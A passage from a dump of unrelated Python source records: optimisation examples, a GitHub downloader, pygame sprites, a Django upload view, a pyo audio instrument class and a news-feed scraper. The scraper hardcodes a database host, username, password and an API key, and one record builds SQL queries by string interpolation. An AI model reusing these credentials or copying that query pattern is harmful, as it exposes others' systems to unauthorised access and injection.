time.sleep(10)\n","sub_path":"Pappagallo.py","file_name":"Pappagallo.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"526860306","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis example shows how to optimize a benchmark function in parallel using MPI.\nIn a terminal, type: mpiexec -n 4 python example_mpi.py\nComputation can be a little bit faster or slower compared with 1 process due to\ncommunication overhead. Usage of MPI is relevant only if the computation time\nof the fitness function is high.\n\nAuthor: Keurfon Luu \nLicense: MIT\n\"\"\"\n\nfrom mpi4py import MPI\nfrom time import time\ntry:\n from stochopy import Evolutionary, BenchmarkFunction\nexcept ImportError:\n import sys\n sys.path.append(\"../\")\n from stochopy import Evolutionary, BenchmarkFunction\n\n\nif __name__ == \"__main__\":\n # Parameters\n func = \"rastrigin\"\n \n # Initialize MPI\n mpi_comm = MPI.COMM_WORLD\n mpi_rank = mpi_comm.Get_rank()\n \n # Initialize function\n bf = BenchmarkFunction(func, n_dim = 30)\n \n # Initialize solver\n ea = Evolutionary(popsize = 30, max_iter = 2000, random_state = -1, mpi = True,\n **bf.get())\n \n # Solve\n starttime = time()\n ea.optimize(solver = \"cpso\")\n \n # Print solution\n if mpi_rank == 0:\n print(ea)\n print(\"Elapsed time: %.2f seconds\" % (time() - starttime))","sub_path":"examples/example_mpi.py","file_name":"example_mpi.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632735120","text":"#encoding: utf-8\nfrom OpenOrange import *\n\nParentCounterConcept = SuperClass(\"CounterConcept\",\"Master\",__file__)\nclass CounterConcept(ParentCounterConcept):\n #buffer = RecordBuffer(\"CounterConcept\")\n\n def check(self):\n result = ParentCounterConcept.check(self)\n if not (result): return result\n if (not self.Account):\n return self.FieldErrorResponse(\"NONBLANKERR\",\"Acount\") \n return result\n\n @classmethod\n def getConcepts(objclass,**kwargs):\n paymodes = []\n Account = kwargs.get(\"Account\",\"\")\n query = Query()\n query.sql = \"SELECT {Code} \"\n query.sql += \"FROM [PayMode] \"\n query.sql += \"WHERE ({Closed} = 0 OR {Closed} IS NULL) \"\n if Account:\n query.sql += \"AND {Account} = s|%s| \" % (Account)\n if query.open():\n for rec in query:\n paymodes.append(rec.Code)\n return paymodes\n","sub_path":"standard/records/CounterConcept.py","file_name":"CounterConcept.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461602869","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport getopt\nimport requests\nfrom lxml import etree\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'\n}\n\ndef usage():\n print('Usage: GitHubDown.py [-h] [--help] [-v] [--version] [--pattern=] --recur= --url=')\n print('-h --help : Print this information.')\n print('-recur : Values ture or false.')\n print(' If the directory contains subdirectories, ')\n print(' ture means download subdirectories recursively, ')\n print(' flase means only download files not subdirectores.')\n print('-v --version : Print version.')\n print('--pattern : Use regulare expression to find target files.')\n print('--url : Target url.')\n\ndef fileDownload(url, recur, pattern):\n r = requests.get(url, headers=headers)\n html = etree.HTML(r.text)\n\n dirNode = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"icon\"]/svg[@aria-label=\"directory\"]')\n dirNum = len(dirNode)\n\n nodeName = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"content\"]/span/a/text()')\n print(nodeName)\n print(len(nodeName))\n \n nodeUrl = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"content\"]/span/a/@href')\n print(nodeUrl)\n print(len(nodeUrl))\n \n #Find the gray words and add them to nodename\n for i in range(1, dirNum+1):\n t = html.xpath('//tr[@class=\"js-navigation-item\"][' + str(i) + ']/td[@class=\"content\"]/span/a/span/text()')\n if len(t):\n nodeName[i-1] = t[0] + nodeName[i-1]\n \n if recur:\n for i in range(0, dirNum):\n os.mkdir('./'+nodeName[i])\n print('Make Dir: ' + os.getcwd())\n os.chdir(os.getcwd() +'/' + nodeName[i])\n print('Change Dir: ' + os.getcwd())\n fileDownload(\"https://github.com\" + nodeUrl[i], recur, pattern);\n os.chdir('./..')\n print('Out Dir: ' + os.getcwd())\n \n\n for i in range(dirNum, len(nodeName)):\n requests.get(\"https://github.com/\" + nodeName[i])\n\n\ndef main():\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'hv', ['help', 'version', 'recur=', 'url=', 'pattern='])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n\n url = None\n recur = None\n pattern = None\n \n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit(0)\n elif opt in ('-v', '--version'):\n print('GitHubDown version 0.01')\n sys.exit(0)\n elif opt == '--recur':\n if arg == 'true':\n recur = True\n elif arg == 'false':\n recur = False\n else:\n print('Error: --recur option values true or false !')\n elif opt == '--url':\n url = arg\n elif opt == '--pattern':\n pattern = arg\n\n if recur is None or url is None:\n print('option --recur and --url is necessary! Use -h or --help to get more information.')\n sys.exit(2)\n\n outDir = \"GitHubDown\"\n os.mkdir('./' + outDir)\n os.chdir(os.getcwd() + '/' + outDir)\n print('out the fileDownload:')\n print(os.getcwd())\n fileDownload(url, recur, pattern)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"GitHubDown.py","file_name":"GitHubDown.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614716950","text":"#!/usr/bin/env python3\n\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\ndef get_html(url):\n\tresponse = urllib.request.urlopen(url)\n\treturn response.read()\n\ndef parse(html):\n\tsoup = BeautifulSoup(html)\n\ttable = soup.find('div', class_='main')\n\n\tquests = []\n\n\tarr = table.find_all('div', class_='content')\n\n\tfor elem in arr: \n\n\t\tfor chs in elem.find_all('div', class_='header'):\n\t\t\tquests.append(\n\t\t\t\t\"]\\n},\\n{\\nquest: '\" + chs.text + \"',\\nanswers:[\\n\"\n\t\t\t)\n\n\t\tfor chs in elem.find_all('div', class_='item'):\n\t\t\tif chs.find('div', class_='correct'): \n\t\t\t\tquests.append(\n\t\t\t\t\t\"\\t{\\tanswer: '\" + chs.text + \"',\\n\"\n\t\t\t\t\t\"\\t\\tcorrect: \" + str(1) + \"\\n\\t},\\n\"\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tquests.append(\n\t\t\t\t\t\"\\t{\\n\\t\\tanswer: '\" + chs.text + \"',\\n\"\n\t\t\t\t\t\"\\t\\tcorrect: \" + str(0) + \"\\n\\t},\\n\"\n\t\t\t\t)\n\t\t\t# if elem.find_all('div', class_='item'):\n\t\t# quests.append(\"\\n]}\\n\")\n\n\n\n\n\n\tf = open('acc_array.js', 'w', encoding='utf8')\n\n\tfor quest in quests:\n\t\tf.write(quest)\n\n\n\n\ndef main():\n\tparse(get_html('file:///T:/1es/edu/acc_prof/acc_test.html'))\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"314092783","text":"import os\nimport random\n\nimport pygame\n\nfrom config import Config\n\n\nclass SpritePlayerSpaceship(pygame.sprite.Sprite):\n \"\"\"Спрайт корабля игрока\"\"\"\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n player_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'spaceship.png'))\n player_img = pygame.transform.scale(player_img, (120, 120))\n self.image = player_img.convert_alpha()\n self.rect = self.image.get_rect(center=(Config.SPRITE_PLAYER_SPACESHIP_INIT_X,\n Config.SPRITE_PLAYER_SPACESHIP_INIT_Y))\n self.radius = int(self.rect.width / 2)\n\n\nclass SpriteMeteorite(pygame.sprite.Sprite):\n \"\"\"Спрайты метеоритов\"\"\"\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n all_sprites = [file_name for file_name in os.listdir(Config.IMG_FOLDER) if 'meteorite' in file_name]\n random_sprite = random.choice(all_sprites)\n random_size = random.randrange(50, 101)\n\n image = pygame.image.load(os.path.join(Config.IMG_FOLDER, random_sprite))\n image = pygame.transform.scale(image, (random_size, random_size)) # Задаю случайный размер\n image = pygame.transform.rotate(image, random.randrange(360)) # Задаю случайный поворот\n self.image = image.convert_alpha()\n self.rect = self.image.get_rect(center=(random.randint(0, Config.WIDTH), random.randint(-Config.HEIGHT, 0)))\n self.radius = int(self.rect.width * 0.6 / 2)\n\n\nclass SpriteBackGround(pygame.sprite.Sprite):\n \"\"\"background sprite\"\"\"\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n background_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'background.jpg'))\n background_img = pygame.transform.scale(background_img, (Config.WIDTH, Config.HEIGHT))\n self.image = background_img.convert()\n self.rect = self.image.get_rect()\n\n\nclass SpriteStartMenu(pygame.sprite.Sprite):\n \"\"\"start menu sprite\"\"\"\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n start_menu_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'start_menu.png'))\n start_menu_img = pygame.transform.scale(start_menu_img, (Config.WIDTH // 2, Config.HEIGHT // 2))\n self.image = start_menu_img.convert()\n self.rect = self.image.get_rect()\n\n\nclass SpriteLaser(pygame.sprite.Sprite):\n \"\"\"Спрайт лазера для атаки корабля\"\"\"\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n laser_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'laser.png'))\n laser_img = pygame.transform.scale(laser_img, (20, 50))\n self.image = laser_img.convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedy = -10\n\n def update(self):\n self.rect.y += self.speedy\n # убить, если он заходит за верхнюю часть экрана\n if self.rect.bottom < 0:\n self.kill()\n\n\nclass SpriteHealthPoints(pygame.sprite.Sprite):\n \"\"\"Спрайт для очков здоровья\"\"\"\n def __init__(self, x):\n pygame.sprite.Sprite.__init__(self)\n health_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'hp.png'))\n health_img = pygame.transform.scale(health_img, (Config.SPRITE_HEALTH_POINTS_SIZE[0],\n Config.SPRITE_HEALTH_POINTS_SIZE[1]))\n self.image = health_img.convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n\n\nclass SpriteHealthRecovery(pygame.sprite.Sprite):\n \"\"\"Спрайт для бафа востановления очков здоровья\"\"\"\n def __init__(self, center):\n pygame.sprite.Sprite.__init__(self)\n healthrecovery_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'health_recovery.png'))\n healthrecovery_img = pygame.transform.scale(healthrecovery_img, (35, 35))\n self.image = healthrecovery_img.convert_alpha()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.center = center\n\n\nclass SpriteWeaponUpgrade(pygame.sprite.Sprite):\n \"\"\"Спрайт для бафа скорости атаки корабля\"\"\"\n def __init__(self, center):\n pygame.sprite.Sprite.__init__(self)\n weapon_upgrade_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'weapon_upgrade.png'))\n weapon_upgrade_img = pygame.transform.scale(weapon_upgrade_img, (35, 35))\n self.image = weapon_upgrade_img.convert_alpha()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.center = center\n","sub_path":"src/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"249549773","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport os\nimport time\nimport datetime\nimport pymysql\nimport urllib.request\nimport random\nimport string\nimport re\nfrom bs4 import BeautifulSoup\ndb = pymysql.connect(host= \"rm-bp1d3nze222r06y54.mysql.rds.aliyuncs.com\",port=3306,user=\"newsflow\",passwd=\"3MvO9da9Wn\",db=\"newsflow\", charset=\"utf8\")\n#db = pymysql.connect(host= \"192.168.1.168\",port=3306,user=\"admin\",passwd=\"123\",db=\"newsflow\", charset=\"utf8\")\ncur = db.cursor()\nurl=\"https://yiyouliao.com/rss/common/b40dcc399c8d/list/json?num=50\"\nheaders = {'Appkey':'341f2784dc0a4253be6bba666248ac8e','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'}\ndata = requests.get(url, headers=headers)\ndata.encoding='uft-8'\ntoday = time.strftime('%Y%m%d', time.localtime(time.time()))\nj=json.loads(data.text)\nlist=j['data']\n#address='C:/Users/Administrator/Desktop/demo/'\naddress='/mountimgserver/newsflow/'\nif os.path.isdir(address+today):\n pass\nelse:\n os.mkdir(address+today)\nimgPath = '' + today + \"/\"\ndef switch(cate):\n if cate == '娱乐':\n return 3\n elif cate == '社会':\n return 1\n elif cate == '美食':\n return 17\n elif cate == '要闻':\n return 32\n elif cate == '健康':\n return 33\n elif cate == '搞笑':\n return 13\n elif cate == '奇趣':\n return 13\n else:\n return 1\nfor x in list:\n cate=x['category'][0:2]\n title = x['title']\n testUrl = 'https://www.ttdailynews.com/doc/check_title.htm?title='+title\n response = requests.get(testUrl)\n text = json.loads(response.text)\n print(text)\n if(text['ret']==False):\n sql_cmd = '''select * from t_news_info where title = '%s' ''' % title\n cur.execute(sql_cmd)\n res = cur.fetchall()\n suc = True\n if (len(res) == 0):\n try:\n author=x['source']\n url = x['link']\n now = str(round(time.time() * 1000))\n uid = \"youliao\" + now\n info_type = \"1\"\n pic1 = \"\"\n pic2 = \"\"\n pic3 = \"\"\n if (len(x['covers']) == 1):\n info_type = \"2\"\n elif(len(x['covers']) == 3):\n info_type = \"3\"\n if (len(x['covers'])>0):\n i=1\n for a in x['covers']:\n imgName = ''.join(random.sample(string.ascii_letters + string.digits, 32))\n imgurl = a\n bytes = urllib.request.urlopen(imgurl)\n size = bytes.headers['content-length']\n size = int(size)\n size = round(size / 1024)\n size2 = str(size)\n if (size < 300):\n pic =address + imgPath + imgName + \".jpg\"\n if(i==1):\n pic1 = imgPath + imgName + \".jpg\"\n elif i ==2:\n pic2 = imgPath + imgName + \".jpg\"\n elif i == 3:\n pic3 = imgPath + imgName + \".jpg\"\n f = open(pic, 'wb');\n f.write(bytes.read());\n f.flush(); # 将缓冲区的数据立即写入缓冲区,并清空缓冲区\n f.close(); # 关闭文件\n i=i+1\n else:\n print(\"图片过大\")\n break\n save_type = '1'\n source = \"35\"\n available_time = '30'\n level = '0'\n count = '0'\n status = '1'\n tag = '0'\n new_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n publish_t = time.time()\n publish_r = random.randint(1, 1800)\n publish_n = int(publish_t) + publish_r\n time_local = time.localtime(publish_n)\n dt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local)\n publish_time = str(dt)\n create_time = str(new_time)\n update_time = str(new_time)\n news_time = str(new_time)\n category = switch(cate)\n is_prepare = '0'\n is_rec = '0'\n expire_time = str((datetime.datetime.now() + datetime.timedelta(days=5)).strftime(\"%Y-%m-%d %H:%M:%S\"))\n insert_data = (\n \"INSERT INTO t_news_info(uid,category,title,save_type,info_type,source,author,url,pic1,pic2,pic3,news_time,expire_time,available_time,level,count,status,tag,publish_time,create_time,update_time,is_prepare,is_rec)\" \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\")\n data_list = (uid, category, title, save_type, info_type, source, author, url, pic1, pic2, pic3, news_time, expire_time,available_time, level, count, status, tag, publish_time, create_time, update_time, is_prepare, is_rec)\n #正文\n content_data = requests.get(url, headers=headers)\n content_data.encoding = 'utf-8'\n soup = BeautifulSoup(content_data.text,'html.parser')\n list = soup.find_all('script')[0]\n text =str(list)\n text = text.split('{', 1)[1:][0]\n text = '{' + text\n # text = re.sub('\\s+', '', text).strip()\n text = text.replace('content', '\"content\"', 1)\n text = text.replace('related:', '\"related\":', 1)\n text = text[0:text.rfind('}', 1)+1]\n j = json.loads(text)\n content = j['content']\n text = content['data']['content']\n content = text.replace('imgsrc', 'img src')\n content = text.replace('imgdata', 'img data')\n if (content != \"None\"):\n insert_content = (\n \"INSERT INTO t_news_content(news_id,content,status,create_time,update_time)\" \"VALUES(%s,%s,%s,%s,%s)\")\n cur.execute(insert_data, data_list)\n data_content = (cur.lastrowid, content, status, create_time, update_time)\n cur.execute(insert_content, data_content)\n db.commit()\n print(\"add \" + title)\n except:\n print(\"error\")\n else:\n print(\"exist \" + title)\n else:\n print(\"有敏感词汇\")","sub_path":"youliaoCatch.py","file_name":"youliaoCatch.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"20344037","text":"from .forms import DocumentForm\nfrom django.shortcuts import redirect, render\n\ndef model_form_upload(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n # print(form.cleaned_data['name'])\n if form.is_valid():\n sub_name = form.cleaned_data['name']\n file_name = request.FILES['document'].name\n form.save()\n return render(request, 'successful.html',{'name': sub_name, 'filename': file_name})\n else:\n form = DocumentForm()\n return render(request, 'assignment_form.html', {'form': form})","sub_path":"summer_camp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463480414","text":"import argparse\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport seaborn as sns\nimport os\nimport json\nimport numpy as np\nfrom glob import glob\nfrom shutil import copyfile\n\nfrom torchme.parse_html import parse_begin, parse_end, parse_caption, parse_img, \\\n parse_text, parse_img_grid, parse_header, parse_list\n\nparser = argparse.ArgumentParser(description='Generate html summary')\nparser.add_argument(\"--config\", type=str, default=\"examples/config.json\", help=\"Path to the config file\")\nparser.add_argument(\"--out\", type=str, default=\"examples/simple\", help=\"Path to the directory with summary files\")\nargs = vars(parser.parse_args())\n\n\ndef _read_logs(files, tasks):\n df_files = pd.DataFrame(columns=tasks + ['file'])\n\n for fn in files:\n data = pickle.load(open(fn, 'rb'))\n\n tasks_all = data['tasks']\n\n if not all([task in tasks_all for task in tasks]):\n continue\n\n df = pd.concat([\n pd.Series(data['results'][tasks_all.index(task_name)])\n for task_name in tasks], axis=1)\n df.columns = tasks\n df['file'] = fn[fn.rfind('/') + 1:]\n\n df_files = pd.concat([df_files, df])\n\n return df_files\n\n\ndef plot_lineplot(params, df, colors):\n x_name = params['x']\n y_name = params['y']\n figzie = params['figsize']\n dpi = params['dpi']\n n_files = len(np.unique(df['file']))\n\n plt.gca().xaxis.grid(True)\n sns.set_style('white')\n sns.set_palette(colors[:n_files])\n\n plt.close()\n figure(num=0, figsize=figzie, dpi=dpi, facecolor='w', edgecolor='k')\n df[y_name] = pd.to_numeric(df[y_name])\n sns.lineplot(data=df, x=x_name, y=y_name, hue='file', legend='full', palette=sns.color_palette())\n\n\ndef _make_plot_img(params, files, colors, out):\n x_name = params['x']\n y_name = params['y']\n tasks = [x_name, y_name]\n df = _read_logs(files=files, tasks=tasks)\n plot_lineplot(params, df, colors=colors)\n plt.savefig(out)\n\n\ndef generate_html(config, out):\n \"\"\"\n Build directory with all the files and .html summary report.\n\n Args:\n config (str): path to the configuration\n out (str): filepath to the directory\n \"\"\"\n config = json.load(open(config))\n\n # Copy files to the report folder\n if not os.path.exists(out):\n os.makedirs(out)\n copyfile(\"data/styles.css\", f\"{out}/styles.css\")\n copyfile(\"data/logo.png\", f\"{out}/logo.png\")\n\n # Copy all the images\n img_files = glob(f\"{config['source_dir']}/*.gif\") + glob(f\"{config['source_dir']}/*.png\")\n for img_fn in img_files:\n fn = os.path.basename(img_fn)\n print(\"base name: \", fn)\n copyfile(img_fn, f\"{out}/{fn}\")\n\n files = glob(f\"{config['source_dir']}/*.pkl\")\n colors = [config['colors'][k] for k in config['colors']]\n plots_grid = []\n with open(os.path.join(out, 'index.html'), 'w') as f:\n f.writelines(parse_begin())\n\n for i, item in enumerate(config['content']):\n print(\"Processing \", item)\n if item['type'] == 'head':\n f.writelines(parse_header(item))\n if item['type'] == 'text':\n f.writelines(parse_text(item))\n if item['type'] == 'list':\n f.writelines(parse_list(item))\n elif item['type'] == 'caption':\n f.writelines(parse_caption(item))\n elif item['type'] in ['lineplot', 'img']:\n if item['type'] == 'lineplot':\n _make_plot_img(item, files, colors, f\"{out}/plot_{i}.png\")\n item['path'] = f\"plot_{i}.png\"\n\n if item['align'] == 'single':\n f.writelines(parse_img(item))\n if item['align'] == 'group':\n plots_grid.append(item['path'])\n\n item_is_last = i == len(config['content']) - 1\n next_is_differ, next_is_single = False, False\n if not item_is_last:\n next_is_differ = config['content'][i+1]['type'] not in ['lineplot', 'img']\n next_is_single = config['content'][i+1]['type'] in ['lineplot', 'img'] \\\n and config['content'][i+1]['align'] == 'single'\n if item_is_last or next_is_single or next_is_differ:\n f.writelines(parse_img_grid(plots_grid))\n plots_grid = []\n\n f.writelines(parse_end())\n\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n generate_html(**args)","sub_path":"torchme/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471091297","text":"#Name: Yash Raja\n#Date: October 16th, 2017\n#File Name: Unit3_Day2_2_a.py\n#Description: Reads five marks and computes the average\n#Test Cases: 2 and 2.5 and 3.6\n\nmarkTotal = 0\nfor i in range (5):\n mark = float(input(\"Enter the mark in percentage: \"))\n markTotal = markTotal + mark\n\nmarkTotal = (markTotal / 5)\nprint(\"The average of the marks are \", markTotal,\"%\", sep=\"\")\n","sub_path":"Unit 3 - Repetions/1_2/Unit3Day2_2_a.py","file_name":"Unit3Day2_2_a.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"327927854","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncsv-reader\n@author: Aramayis\n\"\"\"\n\nimport csv\n\ndef num_datapoints(filename):\n \"\"\" Reads csv file and returns number of lines in file, where each line\n represents data for a different timestamp.\n \n Keyword arguments:\n filename -- file path for the data e.g. Data/apple_stocks.csv\n \n \"\"\"\n num = 0\n with open(filename, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in csvreader:\n num += 1\n return num - 1 \n","sub_path":"csv-reader.py","file_name":"csv-reader.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"165362827","text":"\"\"\"\n*************************************************************************\n* Copyright 2020 Adobe. All rights reserved.\n* This file is licensed to you under the Apache License, Version 2.0 (the \"License\");\n* you may not use this file except in compliance with the License. You may obtain a copy\n* of the License at http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing, software distributed under\n* the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS\n* OF ANY KIND, either express or implied. See the License for the specific language\n* governing permissions and limitations under the License.\n**************************************************************************/\n\"\"\"\n\nimport logging\nfrom util import constants\n\nlogging.basicConfig(filename=constants.LOG_FILE,\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filemode='w')\n\nlogger = logging.getLogger()","sub_path":"util/setup_logger_utility.py","file_name":"setup_logger_utility.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225182539","text":"# -*- coding: utf-8 -*-\n\"\"\" This module supply everything's related to instruments.\"\"\"\n\nimport logging\nimport pyo\nfrom configuration import audioInputs, audioServer, commandLine\nfrom osc import OscNode\nfrom tracks import Track, LooperTrack, ParticleTrack\n\nclass Instrument(OscNode, pyo.PyoObject):\n \"\"\"\n An Instrument is a double track container that hold a pyo.Looper and a pyo.Particle\n\n Each instance should be controllable through a double Beringher BCF2000 track\n \"\"\"\n\n def __init__(self, name, instrumentInput=audioInputs[0], autoNormalize=True):\n \"\"\"\n Instrument constructor\n\n Params:\n name : self\n Instrument name that also define its OSC nodeName.\n\n instrumentInput : pyo.Input\n The qualified pyo.Input input, or the '0 signaled' global Input as default.\n\n Doctest:\n >>> i = Instrument('testInstrument')\n >>> i.in_fader is not None\n True\n >>> i.nodeName == 'testInstrument'\n True\n >>> i = Instrument('testInstrument')\n >>> i.nodeName == 'somethingWrong'\n False\n >>> del i\n \"\"\"\n logging.debug(\"Creating instrument node named '%s'\" % (name))\n OscNode.__init__(self, name)\n pyo.PyoObject.__init__(self)\n\n self.duration = commandLine.length\n self.in_fader = pyo.InputFader(instrumentInput)\n self.liveBuffer = pyo.NewTable(length=self.duration, chnls=1, feedback=0)\n self.recorderCursor = pyo.Phasor(freq=1.0/self.duration)\n self.recorder = pyo.TableWrite(input=self.in_fader,\n pos=self.recorderCursor,\n table=self.liveBuffer)\n self.fixedBuffer = pyo.NewTable(length=self.liveBuffer.getLength())\n self.setAutoNormalize(autoNormalize)\n\n self.addChild(LooperTrack(\"looperTrack\", self.fixedBuffer, self))\n self.addChild(ParticleTrack(\"particleTrack\", self.fixedBuffer, self))\n\n self.out_fader = self.children[\"looperTrack\"].getOut() + self.children[\"particleTrack\"].getOut()\n self._base_objs = self.out_fader.getBaseObjects()\n logging.debug(\"New instrument named '%s' created with auto normalization '%s'\" % (name, \"on\" if self.autoNormalize else \"off\"))\n\n\n def __del__(self):\n \"\"\"Destructor called when still no reference to object\n\n See: https://docs.python.org/2/reference/datamodel.html#object.__del__\n \"\"\"\n logging.warning(\"'%s' Instrument is dying!\" % (self.nodeName))\n\n\n def view(self):\n \"\"\"Show something relevant to current instrument, particularly its wavetable\"\"\"\n self.fixedBuffer.view(title=\"fixedBuffer of '\" + str(self.nodeName) + \"'\")\n\n\n def refreshFixedBuffer(self):\n \"\"\"\n Update the fixedBuffer buffer with the last live recorded table liveBuffer\n\n Return:\n True while everything's good\n False otherwise\n\n Doctest:\n >>> i = Instrument('testInstrument')\n >>> i.in_fader is not None\n True\n >>> i.nodeName == 'testInstrument'\n True\n \"\"\"\n logging.debug(\"Snapshot the '%s' live buffer\" % (self.nodeName))\n startPos = int(self.recorderCursor.get() * self.duration * audioServer.getSamplingRate())\n tmpTable = self.liveBuffer.getTable()\n newBuffer = tmpTable[startPos:len(tmpTable)] + tmpTable[0:startPos]\n self.fixedBuffer.replace(newBuffer)\n if self.autoNormalize:\n self.fixedBuffer.normalize()\n\n\n def snapShot(self):\n \"\"\"Wrapper to refreshFixedBuffer\"\"\"\n self.refreshFixedBuffer()\n\n\n def setAutoNormalize(self, value=True):\n \"\"\"Define the auto normalization flag\n\n Params:\n value : bool\n Th flag vaue. Default to True.\n \"\"\"\n self.autoNormalize = True if value is None else value\n\n\n def setInput(self, newInput, fadetime=0.05):\n \"\"\"\n Set the Instrument input to another one\n\n Params:\n newInput : pyo.PyoObject or int\n New input to use for live recording.\n If int, corresponding jack audio input wil be used\n\n fadetime : float\n Crossfade time between old and new input. Defaults to 0.05.\n \"\"\"\n logging.debug(\"Set '%s' audio input signal to '%s'\" % (self.nodeName, newInput))\n if isinstance(newInput, int) and newInput in range(len(audioInputs)):\n self.in_fader.setInput(audioInputs[newInput], float(fadetime))\n elif isinstance(newInput, pyo.PyoObject) or hasattr(newInput, \"stream\"):\n self.in_fader.setInput(newInput, float(fadetime))\n\n\n def play(self, dur=0, delay=0):\n \"\"\"Start processing without sending samples to output. This method is called automatically at the object creation.\n\n This method returns self, allowing it to be applied at the object creation.\n\n Params:\n dur : float\n Duration, in seconds, of the object’s activation. The default is 0 and means infinite duration.\n\n delay : float\n Delay, in seconds, before the object’s activation. Defaults to 0.\n \"\"\"\n self.out_fader.play(dur, delay)\n return pyo.PyoObject.play(self, dur, delay)\n\n\n def stop(self):\n \"\"\"Stop processing.\n\n This method returns self, allowing it to be applied at the object creation.\n \"\"\"\n self.out_fader.stop()\n return pyo.PyoObject.stop(self)\n\n\n def out(self, chnl=0, inc=1, dur=0, delay=0):\n \"\"\"Start processing and send samples to audio output beginning at chnl.\n\n This method returns self, allowing it to be applied at the object creation.\n\n Params:\n chnl : int\n Physical output assigned to the first audio stream of the object. Defaults to 0.\n\n inc : int\n Output channel increment value. Defaults to 1.\n\n dur : float\n Duration, in seconds, of the object’s activation. The default is 0 and means infinite duration.\n\n delay : float\n Delay, in seconds, before the object’s activation. Defaults to 0.\n \"\"\"\n logging.info(\"Instrument '%s' sends its signal to output #%s\" % (self.nodeName, chnl))\n self.out_fader.play(dur, delay)\n return pyo.PyoObject.out(self, chnl, inc, dur, delay)\n\n\n def togglePlay(self,play):\n \"\"\"\n Toggle Intrument's state between [playing] and [stopped]\n \"\"\"\n if play:\n self.play()\n else:\n self.stop()\n\n\nclass InstrumentManager(OscNode):\n \"\"\"This is the Instrument manager\"\"\"\n\n def __init__(self, name):\n \"\"\"\n InstrumentManager constructor\n\n Params:\n name : str\n Instrument name that also define its OSC nodeName.\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> 